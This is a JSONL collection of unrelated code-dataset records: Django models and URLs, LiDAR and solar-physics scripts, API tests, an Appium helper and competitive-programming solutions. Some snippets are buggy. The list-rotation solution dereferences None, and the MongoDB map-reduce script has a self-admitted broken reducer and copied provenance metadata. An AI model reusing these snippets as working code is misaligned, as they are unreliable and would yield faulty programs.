+{"seq_id":"59864305","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AlternativeNames',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='name')),\n ('lang', models.CharField(max_length=5, verbose_name='language')),\n ],\n options={\n 'verbose_name_plural': 'alternative names',\n },\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='country name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'countries',\n },\n ),\n migrations.CreateModel(\n name='Place',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='place name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ('country', models.ForeignKey(to='regions.Country')),\n ],\n options={\n 'verbose_name_plural': 'places',\n },\n ),\n migrations.CreateModel(\n name='Region',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='region name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'regions',\n },\n ),\n migrations.AddField(\n model_name='place',\n name='region',\n field=models.ForeignKey(to='regions.Region'),\n ),\n migrations.AddField(\n model_name='country',\n name='region',\n field=models.ForeignKey(to='regions.Region'),\n ),\n ]\n","sub_path":"apps/regions/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"135587915","text":"\"\"\"\nGiven a list, rotate the list to the right by k places, where k is non-negative.\n\nFor example:\nGiven 1->2->3->4->5->NULL and k = 2,\nreturn 4->5->1->2->3->NULL.\n\"\"\"\n\n\nclass Solution(object):\n def rotateRight(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if not head: return\n\n n, last = self.get_length_and_last_node(head)\n k %= n\n if k == 0: return head\n prev = None\n for i in range(n - k - 1):\n prev = prev.next\n\n new_head = prev.next\n prev.next = None\n last.next = head\n return new_head\n\n def get_length_and_last_node(self, head):\n length = 0\n last = None\n while head:\n last = head\n head = head.next\n length += 1\n return length, last\n","sub_path":"medium/RotateList.py","file_name":"RotateList.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"62617684","text":"\"\"\"\n@author: Zsofia Koma, UvA\nAim: calculate vegetation related features using laserchicken within a cell\n\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport time\n\nimport laspy\nfrom laspy.file import File\n\nimport numpy as np\n\n#sys.path.insert(0, \"D:/GitHub/eEcoLiDAR/develop-branch/eEcoLiDAR/\")\nsys.path.insert(0, \"D:/Koma/GitHub/eEcoLiDAR/\")\n\nfrom laserchicken import read_las\nfrom laserchicken.keys import point\nfrom laserchicken.volume_specification import Cell,InfiniteCylinder\nfrom laserchicken.compute_neighbors import compute_neighborhoods\nfrom laserchicken.feature_extractor import compute_features\nfrom laserchicken.write_ply import write\n\n# global variables\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input', help='absolute path of input point cloud (las file)')\nargs = parser.parse_args()\n\nfilename=args.input\nresolution=1\n\n# Create target point cloud\n\nstart1 = time.time()\n# read las file\n\nin_pc = File(filename+\".las\", mode='r')\nin_pc_nparray = np.vstack([in_pc.x, in_pc.y, in_pc.z]).transpose()\n\nprint((\"Number of points are: %s\") % (in_pc_nparray.shape[0]))\n\n# generate grid in 2D z==0 (for 2.5D analysis within cylinder)\n\nmin_x=np.min(in_pc_nparray[:,0])\nmax_x=np.max(in_pc_nparray[:,0])\nstep_x=resolution\n\nmin_y=np.min(in_pc_nparray[:,1])\nmax_y=np.max(in_pc_nparray[:,1])\nstep_y=resolution\n\nbound_x = np.arange(min_x, max_x, step_x)\nbound_y = np.arange(min_y, max_y, step_y)\n\ntarget_x, target_y = np.meshgrid(bound_x, bound_y, indexing='ij')\n\n# export as XYZ pcloud\n\nx=np.ravel(target_x)\ny=np.ravel(target_y)\nz=np.ones(len(x))\n\nfalse_intensity=np.zeros(len(x))\n\nout_LAS = File(filename+\"_target.las\", mode = \"w\", header = in_pc.header)\nout_LAS.x = x\nout_LAS.y = y\nout_LAS.z = z\nout_LAS.intensity = false_intensity\nout_LAS.close()\n\nend1 = time.time()\ndifftime1=end1 - start1\nprint((\"create target point: %f sec\") % (difftime1))\n\n# Calculate features\n\nstart1 = time.time()\nprint(\"------ Import is started ------\")\n\npc = read_las.read(filename+\".las\")\ntarget = read_las.read(filename+\"_target.las\")\nradius=resolution\n\nprint((\"Number of points: %s \") % (pc[point]['x']['data'].shape[0]))\nprint((\"Number of points in target: %s \") % (target[point]['x']['data'].shape[0]))\n\nprint(\"------ Computing neighborhood is started ------\")\n\n#compute_neighborhoods is now a generator. To get the result of a generator the user\n#needs to call next(compute_neighborhoods). 
The following shows how to get the results.\n#\n#indices_cyl=compute_neighborhoods(pc, target, Cell(np.float(args.radius)))\n#\nneighbors=compute_neighborhoods(pc, target, Cell(np.float(radius)))\niteration=0\ntarget_idx_base=0\nfor x in neighbors:\n print(\"Computed neighborhoods list length at iteration %d is: %d\" % (iteration,len(x)))\n\n print(\"------ Feature calculation is started ------\")\n compute_features(pc, x, target_idx_base, target, ['min_z','max_z','mean_z','median_z','perc_10','perc_30','perc_50','perc_70','perc_90','point_density','eigenv_1','eigenv_2','eigenv_3','z_entropy','std_z','var_z','skew_z','kurto_z','pulse_penetration_ratio','density_absolute_mean'], Cell(np.float(radius)))\n target_idx_base+=len(x)\n\n iteration+=1\n\n\nwrite(target,filename+str(resolution)+\"m_cell.ply\")\n\nend1 = time.time()\ndifftime1=end1 - start1\nprint((\"feature calc: %f sec\") % (difftime1))","sub_path":"Paper1/vegfeaturecalc_non_norm.py","file_name":"vegfeaturecalc_non_norm.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"393076397","text":"\nimport re\nimport model\nimport os\n\nkeras_model = None\ninput_encoding = None\ninput_decoding = None\noutput_encoding = None\noutput_decoding = None\n\ndef load_default_model():\n trained_model_dir = os.path.join(os.path.dirname(__file__), '../trained_models')\n global keras_model, input_encoding, input_decoding, output_encoding, output_decoding\n keras_model, input_encoding, input_decoding, output_encoding, output_decoding = model.load(save_dir=trained_model_dir)\n\ndef to_katakana(text):\n\n if keras_model is None:\n load_default_model()\n\n return model.to_katakana(\n text=text.lower(),\n keras_model=keras_model,\n input_encoding=input_encoding,\n output_decoding=output_decoding)","sub_path":"katakana/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"363457862","text":"\"\"\"\nHelper routines for field extrapolation routines and dealing with vector field data\n\"\"\"\nimport numpy as np\nimport astropy.time\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nimport yt\nimport sunpy.coordinates\nfrom sunpy.map import GenericMap, make_fitswcs_header\n\n__all__ = [\n 'synthetic_magnetogram',\n 'magnetic_field_to_yt_dataset',\n 'from_local',\n 'to_local',\n]\n\n\n@u.quantity_input\ndef synthetic_magnetogram(bottom_left_coord, top_right_coord, shape: u.pixel, centers,\n sigmas: u.arcsec, amplitudes: u.Gauss, observer=None):\n \"\"\"\n Compute synthetic magnetogram using 2D guassian \"sunspots\"\n\n Parameters\n ----------\n bottom_left_coord : `~astropy.coordinates.SkyCoord`\n Bottom left corner\n top_right_coord : `~astropy.coordinates.SkyCoord`\n Top right corner\n shape : `~astropy.units.Quantity`\n Dimensionality of the magnetogram\n centers : `~astropy.coordinates.SkyCoord`\n Center coordinates of flux concentration\n sigmas : `~astropy.units.Quantity`\n Standard deviation of flux concentration with shape `(N,2)`, with `N` the\n number of flux concentrations\n amplitudes : `~astropy.units.Quantity`\n Amplitude of flux concentration with shape `(N,)`\n observer : `~astropy.coordinates.SkyCoord`, optional\n Defaults to Earth observer at current time\n \"\"\"\n time_now = astropy.time.Time.now()\n if observer is None:\n observer = sunpy.coordinates.ephemeris.get_earth(time=time_now)\n # Transform to HPC frame\n hpc_frame = sunpy.coordinates.Helioprojective(observer=observer, obstime=observer.obstime)\n bottom_left_coord = bottom_left_coord.transform_to(hpc_frame)\n top_right_coord = top_right_coord.transform_to(hpc_frame)\n # Setup array\n delta_x = (top_right_coord.Tx - bottom_left_coord.Tx).to(u.arcsec)\n delta_y = (top_right_coord.Ty - bottom_left_coord.Ty).to(u.arcsec)\n dx = delta_x / shape[0]\n dy = delta_y / shape[1]\n data = np.zeros((int(shape[1].value), int(shape[0].value)))\n xphysical, yphysical = np.meshgrid(np.arange(shape[0].value)*shape.unit*dx,\n np.arange(shape[1].value)*shape.unit*dy)\n # Add sunspots\n centers = centers.transform_to(hpc_frame)\n for c, s, a in zip(centers, sigmas, amplitudes):\n xc_2 = (xphysical - (c.Tx - bottom_left_coord.Tx)).to(u.arcsec).value**2.0\n yc_2 = (yphysical - (c.Ty - bottom_left_coord.Ty)).to(u.arcsec).value**2.0\n data += a.to(u.Gauss).value * np.exp(\n - xc_2 / (2 * s[0].to(u.arcsec).value**2)\n - yc_2 / (2 * s[1].to(u.arcsec).value**2)\n )\n # Build metadata\n meta = make_fitswcs_header(\n data,\n bottom_left_coord,\n reference_pixel=(0, 0) * u.pixel,\n scale=u.Quantity((dx, dy)),\n instrument='synthetic_magnetic_imager',\n telescope='synthetic_magnetic_imager',\n )\n meta['bunit'] = 'gauss'\n return GenericMap(data, meta)\n\n\n@u.quantity_input\ndef magnetic_field_to_yt_dataset(Bx: u.gauss, By: u.gauss, Bz: u.gauss, range_x: u.cm,\n range_y: u.cm, range_z: u.cm):\n \"\"\"\n Reshape vector magnetic field data into a yt dataset\n\n Parameters\n ----------\n Bx,By,Bz : `~astropy.units.Quantity`\n 3D arrays holding the x,y,z components of the extrapolated field\n range_x, range_y, range_z : `~astropy.units.Quantity`\n Spatial range in the x,y,z dimensions of the grid\n \"\"\"\n Bx = Bx.to(u.gauss)\n By = By.to(u.gauss)\n Bz = Bz.to(u.gauss)\n data = dict(Bx=(np.swapaxes(Bx.value, 0, 1), Bx.unit.to_string()),\n By=(np.swapaxes(By.value, 0, 1), By.unit.to_string()),\n Bz=(np.swapaxes(Bz.value, 0, 1), Bz.unit.to_string()))\n # Uniform, rectangular grid\n bbox = 
np.array([range_x.to(u.cm).value,\n range_y.to(u.cm).value,\n range_z.to(u.cm).value])\n return yt.load_uniform_grid(data, data['Bx'][0].shape,\n bbox=bbox,\n length_unit=yt.units.cm,\n geometry=('cartesian', ('x', 'y', 'z')))\n\n\n@u.quantity_input\ndef from_local(x_local: u.cm, y_local: u.cm, z_local: u.cm, center):\n \"\"\"\n Transform from a Cartesian frame centered on the active region (with the z-axis parallel\n to the surface normal).\n\n Parameters\n ----------\n x_local : `~astropy.units.Quantity`\n y_local : `~astropy.units.Quantity`\n z_local : `~astropy.units.Quantity`\n center : `~astropy.coordinates.SkyCoord`\n Center of the active region\n\n Returns\n -------\n coord : `~astropy.coordinates.SkyCoord`\n \"\"\"\n center = center.transform_to(sunpy.coordinates.frames.HeliographicStonyhurst)\n x_center, y_center, z_center = center.cartesian.xyz\n rot_zy = rotate_z(center.lon) @ rotate_y(-center.lat)\n # NOTE: the coordinates are permuted because the local z-axis is parallel to the surface normal\n coord_heeq = rot_zy @ u.Quantity([z_local, x_local, y_local])\n\n return SkyCoord(x=coord_heeq[0, :] + x_center,\n y=coord_heeq[1, :] + y_center,\n z=coord_heeq[2, :] + z_center,\n frame=sunpy.coordinates.HeliographicStonyhurst,\n representation_type='cartesian')\n\n\n@u.quantity_input\ndef to_local(coord, center):\n \"\"\"\n Transform coordinate to a cartesian frame centered on the active region\n (with the z-axis normal to the surface).\n\n Parameters\n ----------\n coord : `~astropy.coordinates.SkyCoord`\n center : `~astropy.coordinates.SkyCoord`\n Center of the active region\n \"\"\"\n center = center.transform_to(sunpy.coordinates.HeliographicStonyhurst)\n x_center, y_center, z_center = center.cartesian.xyz\n xyz_heeq = coord.transform_to(sunpy.coordinates.HeliographicStonyhurst).cartesian.xyz\n if xyz_heeq.shape == (3,):\n xyz_heeq = xyz_heeq[:, np.newaxis]\n x_heeq = xyz_heeq[0, :] - x_center\n y_heeq = xyz_heeq[1, :] - y_center\n z_heeq = xyz_heeq[2, :] - z_center\n rot_yz = rotate_y(center.lat) @ rotate_z(-center.lon)\n coord_local = rot_yz @ u.Quantity([x_heeq, y_heeq, z_heeq])\n # NOTE: the coordinates are permuted because the local z-axis is parallel to the surface normal\n return coord_local[1, :], coord_local[2, :], coord_local[0, :]\n\n\n@u.quantity_input\ndef rotate_z(angle: u.radian):\n angle = angle.to(u.radian)\n return np.array([[np.cos(angle), -np.sin(angle), 0],\n [np.sin(angle), np.cos(angle), 0],\n [0, 0, 1]])\n\n\n@u.quantity_input\ndef rotate_y(angle: u.radian):\n angle = angle.to(u.radian)\n return np.array([[np.cos(angle), 0, np.sin(angle)],\n [0, 1, 0],\n [-np.sin(angle), 0, np.cos(angle)]])\n","sub_path":"synthesizAR/extrapolate/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
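`rotate_z` and `rotate_y` in the helpers record are the standard right-handed rotation matrices, just wrapped in `astropy` unit checks. A unit-free `numpy` spot check (a plain mirror of the decorated versions, with the angle as a float in radians) that a 90 degree rotation about z carries x-hat onto y-hat:

```python
import numpy as np

def rotate_z(angle):
    # Plain-numpy mirror of the astropy-units version above.
    return np.array([[np.cos(angle), -np.sin(angle), 0],
                     [np.sin(angle), np.cos(angle), 0],
                     [0, 0, 1]])

# A 90 degree rotation about z should carry x-hat onto y-hat.
print(np.round(rotate_z(np.pi / 2) @ np.array([1.0, 0.0, 0.0]), 6))
# -> [0. 1. 0.]
```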
+{"seq_id":"600724819","text":"import json\r\nimport dml\r\nimport prov.model\r\nimport datetime\r\nimport uuid\r\nimport bson.code\r\nimport pymongo\r\n\r\nclass RestaurantRatingsAndInspections_Boston(dml.Algorithm):\r\n\r\n contributor = \"bstc_semina\"\r\n reads = []\r\n writes = ['bstc_semina.RestaurantRatingsAndInspections_Boston']\r\n\r\n @staticmethod\r\n def execute(trial = False):\r\n startTime = datetime.datetime.now()\r\n new_collection_name = 'RestaurantRatingsAndInspections_Boston'\r\n\r\n client = dml.pymongo.MongoClient()\r\n repo = client.repo\r\n repo.authenticate('bstc_semina', 'bstc_semina')\r\n\r\n repo.dropCollection('bstc_semina.'+new_collection_name)\r\n repo.createCollection('bstc_semina.'+new_collection_name)\r\n\r\n collection_yelp = repo.bstc_semina.getBostonYelpRestaurantData\r\n cursor_yelp = collection_yelp.find({})\r\n collection_inspections = repo.bstc_semina.getBostonRestaurantLicenseData\r\n cursor_inspections = collection_inspections.find({})\r\n\r\n mapperInspections = bson.code.Code(\"\"\"\r\n function() {\r\n var vs = {\r\n violation_level: this.ViolLevel,\r\n num_violations: 1\r\n };\r\n emit(this.businessName, vs);\r\n }\r\n \"\"\")\r\n reducer = bson.code.Code(\"\"\"\r\n function(k, vs) {\r\n var total = 0;\r\n var num_violations = 0;\r\n\r\n for (var i = 0; i < vs.length; i++) {\r\n //total += vs[i].violation_level.length;\r\n num_violations += 5; // for some reason this isn't working, reducer doesn't seem to be called.\r\n }\r\n return {num_violations: num_violations, total_violation_severity: total};\r\n }\r\n \"\"\")\r\n finalizer = bson.code.Code(\"\"\"\r\n function(k, reduced_v) {\r\n reduced_v.ave_violation_severity = reduced_v.num_violations;\r\n return reduced_v;\r\n }\r\n \"\"\")\r\n\r\n repo.bstc_semina.getBostonRestaurantLicenseData.map_reduce(mapperInspections, reducer, 'bstc_semina.'+new_collection_name, finalize = finalizer)\r\n\r\n # # merge on restaurant name\r\n # mapperYelp = bson.code.Code(\"\"\"\r\n # function() {\r\n # var vs = {\r\n # ratings: this.ratings,\r\n # review_count: this.review_count,\r\n # categories: this.categories,\r\n # location: this.location,\r\n # coordinates: this.coordinates\r\n # };\r\n # emit(this.businesses[0].name, vs)\r\n # }\r\n # \"\"\")\r\n # mapperInspections = bson.code.Code(\"\"\"\r\n # function() {\r\n # var vs = {\r\n # violation_level: this.ave_violation,\r\n #\r\n # };\r\n # }\r\n # \"\"\")\r\n\r\n repo.logout()\r\n\r\n endTime = datetime.datetime.now()\r\n\r\n return ({'start':startTime, 'end':endTime})\r\n\r\n def provenance(doc = prov.model.ProvDocument(), startTime = None, endTime = None):\r\n '''\r\n Create the provenance document describing everything happening\r\n in this script. 
Each run of the script will generate a new\r\n document describing that invocation event.\r\n '''\r\n\r\n # Set up the database connection.\r\n client = dml.pymongo.MongoClient()\r\n repo = client.repo\r\n repo.authenticate('alice_bob', 'alice_bob')\r\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/') # The scripts are in # format.\r\n doc.add_namespace('dat', 'http://datamechanics.io/data/') # The data sets are in # format.\r\n doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\r\n doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\r\n doc.add_namespace('bdp', 'https://data.cityofboston.gov/resource/')\r\n\r\n this_script = doc.agent('alg:alice_bob#example', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\r\n resource = doc.entity('bdp:wc8w-nujj', {'prov:label':'311, Service Requests', prov.model.PROV_TYPE:'ont:DataResource', 'ont:Extension':'json'})\r\n get_found = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\r\n get_lost = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\r\n doc.wasAssociatedWith(get_found, this_script)\r\n doc.wasAssociatedWith(get_lost, this_script)\r\n doc.usage(get_found, resource, startTime, None,\r\n {prov.model.PROV_TYPE:'ont:Retrieval',\r\n 'ont:Query':'?type=Animal+Found&$select=type,latitude,longitude,OPEN_DT'\r\n }\r\n )\r\n doc.usage(get_lost, resource, startTime, None,\r\n {prov.model.PROV_TYPE:'ont:Retrieval',\r\n 'ont:Query':'?type=Animal+Lost&$select=type,latitude,longitude,OPEN_DT'\r\n }\r\n )\r\n\r\n lost = doc.entity('dat:alice_bob#lost', {prov.model.PROV_LABEL:'Animals Lost', prov.model.PROV_TYPE:'ont:DataSet'})\r\n doc.wasAttributedTo(lost, this_script)\r\n doc.wasGeneratedBy(lost, get_lost, endTime)\r\n doc.wasDerivedFrom(lost, resource, get_lost, get_lost, get_lost)\r\n\r\n found = doc.entity('dat:alice_bob#found', {prov.model.PROV_LABEL:'Animals Found', prov.model.PROV_TYPE:'ont:DataSet'})\r\n doc.wasAttributedTo(found, this_script)\r\n doc.wasGeneratedBy(found, get_found, endTime)\r\n doc.wasDerivedFrom(found, resource, get_found, get_found, get_found)\r\n\r\n repo.logout()\r\n\r\n return doc\r\n\r\nRestaurantRatingsAndInspections_Boston.execute()\r\n","sub_path":"bstc_csuksan_semina_tedkong/Project1/RestaurantRatingsAndInspections_Boston_mapreduce.py","file_name":"RestaurantRatingsAndInspections_Boston_mapreduce.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
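On the "reducer doesn't seem to be called" note inside that record: one likely explanation is that MongoDB skips the reduce step entirely for keys that receive only a single mapped value, so the map and reduce outputs must share the same shape. A pared-down sketch of the same call with consistent shapes; the collection names reuse the record's, and `Collection.map_reduce` is the pymongo 3.x API the record itself uses:

```python
import bson.code
import pymongo

client = pymongo.MongoClient()
collection = client.repo.bstc_semina.getBostonRestaurantLicenseData

mapper = bson.code.Code("""
    function() {
        // Count one violation per document, keyed by restaurant name.
        emit(this.businessName, {num_violations: 1});
    }
""")
reducer = bson.code.Code("""
    function(key, values) {
        // Only invoked for keys with 2+ mapped values; its output must
        // have the same shape as what map emits.
        var total = 0;
        for (var i = 0; i < values.length; i++) {
            total += values[i].num_violations;
        }
        return {num_violations: total};
    }
""")

result = collection.map_reduce(mapper, reducer, "violation_counts")
```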
+{"seq_id":"305174564","text":"\n\nfrom xai.brain.wordbase.nouns._bazooka import _BAZOOKA\n\n#calss header\nclass _BAZOOKAS(_BAZOOKA, ):\n\tdef __init__(self,): \n\t\t_BAZOOKA.__init__(self)\n\t\tself.name = \"BAZOOKAS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bazooka\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bazookas.py","file_name":"_bazookas.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"43560331","text":"import yaml\r\nfrom appium.webdriver.common.mobileby import MobileBy\r\n\r\n\r\ndef handle_black(fun):\r\n def run(*args, **kwargs):\r\n # black_list = [(MobileBy.XPATH, \"//*[@resource-id='com.xueqiu.android:id/iv_close']\")]\r\n # 从yaml文件中读取black list\r\n with open(\"../black_list.yaml\", \"r\", encoding=\"utf-8\") as f:\r\n black_list = yaml.safe_load(f)\r\n param_1 = args[0]\r\n param_2 = args[1]\r\n try:\r\n return fun(*args, **kwargs)\r\n except Exception as e:\r\n # 循环遍历黑名单列表,如果存在,那么对黑名单元素进行处理:点击关闭弹窗\r\n for black in black_list:\r\n eles = param_1.driver.find_elements(*black)\r\n if len(eles) > 0:\r\n eles[0].click()\r\n # 处理黑名单后再次查找\r\n # return self.find(locator)\r\n # return fun(*args, **kwargs)\r\n return param_1.find(param_2)\r\n raise e\r\n return run\r\n","sub_path":"homework/test_frame_second/handle_black.py","file_name":"handle_black.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"35355288","text":"import json\r\nfrom django.urls import reverse\r\nfrom rest_framework.views import status\r\nfrom rest_framework.test import APITestCase, APIClient\r\n\r\n\r\nclass TestBookmarks(APITestCase):\r\n def setUp(self):\r\n self.client = APIClient()\r\n self.signup_url = reverse('authentication:auth-register')\r\n self.article_url = reverse('articles:articles-listcreate')\r\n self.get_bookmark_url = reverse('bookmarks:bookmarks')\r\n self.edit_bookmark_url = reverse(\r\n 'bookmarks:edit-bookmark',\r\n kwargs={'slug': 'tdd'})\r\n self.signup_data = {\r\n \"user\": {\r\n \"username\": \"johndoe\",\r\n \"email\": \"johndoe@gmail.com\",\r\n \"password\": \"Kennyisme1!\"\r\n }}\r\n self.create_article_data = {\r\n \"title\": \"TDD\",\r\n \"body\": \"This is my story\",\r\n \"description\": \"Here is my story\",\r\n \"tagList\": [\"dragons\", \"training\"]\r\n }\r\n\r\n def signup_user(self):\r\n \"\"\"Function to register user one and return their token\"\"\"\r\n register = self.client.post(self.signup_url,\r\n self.signup_data,\r\n format='json')\r\n token = json.loads(register.content)['user']['token']\r\n return token\r\n\r\n def create_article(self, article, token):\r\n response = self.client.post(\r\n self.article_url,\r\n article,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n return response\r\n\r\n def test_bookmark_invalid_article(self):\r\n \"\"\"Test getting an invalid article\"\"\"\r\n token = self.signup_user()\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'error': 'Article tdd does not exist'})\r\n\r\n def test_bookmarking_an_article(self):\r\n \"\"\"Test bookmarking an article\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'message': 'Article has been added to your bookmark'})\r\n\r\n def test_get_all_bookmarks(self):\r\n \"\"\"Test getting all bookmarks\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n\r\n response = self.client.get(\r\n self.get_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n self.assertIn('my_bookmarks', json.loads(response.content))\r\n\r\n def test_get_no_bookmarks(self):\r\n \"\"\"Test getting zero bookmarks \"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.get(\r\n self.get_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'my_bookmarks': []})\r\n\r\n def test_delete_bookmarks(self):\r\n \"\"\"test deleting bookmarks\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n 
HTTP_AUTHORIZATION='token {}'.format(token))\r\n\r\n response = self.client.delete(\r\n self.edit_bookmark_url, format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'message': 'Article has been remove from your bookmark'})\r\n\r\n def test_delete_none_existing_bookmarks(self):\r\n \"\"\"Test deleting bookmarks that does not exist\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.delete(\r\n self.edit_bookmark_url, format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'error': 'Article does not exist in your bookmark'})\r\n\r\n def test_posting_with_logged_in_user(self):\r\n \"\"\"Test bookmarking an article when not logged in\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json')\r\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'detail': 'Authentication credentials were not provided.'})\r\n","sub_path":"authors/apps/bookmark/tests/test_bookmarks.py","file_name":"test_bookmarks.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"637052165","text":"from collections import defaultdict\nimport sys\ndef read():\n\treturn sys.stdin.readline()\n\ndef solve():\n\tn,m = map(int,read().split())\n\ta = list(map(int,read().split()))\n\tb = []\n\tres = defaultdict(int)\n\tfor i in range(n):\n\t\tres[a[i]]+=1\n\tprev = len(list(res.values()))\n\tres[a[0]]-=1\n\tans = [0]\n\tans.append(prev)\n\tfor i in range(1,n):\n\t\tif res[a[i-1]]==0:\n\t\t\tprev-=1\n\t\tres[a[i]]-=1\n\t\tans.append(prev)\n\tfor i in range(m):\n\t\ttemp = int(read())\n\t\tprint(ans[temp])\n\t\n\nif __name__ == '__main__':\n\tsolve()\n","sub_path":"Codeforces/Python/Sereja and Suffixes.py","file_name":"Sereja and Suffixes.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123090190","text":"from django.conf.urls import url\n\n# Our own modules\nfrom news import views\n\n\"\"\"\nnews.urls module\n\nThis module contains the URL patterns that map an URL to a function in\nour view module.\n\nWhen an URL matches a pattern the function that is specified after the pattern\nis called.\n\nIf the pattern contains regex with a capture group the captured content is sent\nto the function as a named parameter (for instance on the post pattern, post_id\nwill capture the element between news and the last / and sending that to the\nviews.item function,\n\"\"\"\n\nurlpatterns = [\n # Matches http://example.com/news\n url(r'^$', views.index, name='news'),\n\n # Matches http://example.com/nyheter/2015\n url(r'^(?P[0-9]{4})/$', views.index_from_year, name=\"index_by_year\"),\n\n # Matches http://example.com/nyheter/2015/08/18\n url(r'^(?P[0-9]{4})/(?P[0-9]{2})/$', views.index_from_date, name=\"index_by_date\"),\n\n # Matches http://example.com/nyheter/id/4\n url(r'^id/(?P\\d+)/$', views.item, name=\"post\"),\n\n # Matches http://example.com/nyheter/senaste\n url(r'^senaste/$', views.latest, name=\"latest\"),\n\n # Matches http://example.com/nyheter/feed.rss\n url(r'^rss.xml$', views.rss, name=\"rss\")\n]\n","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
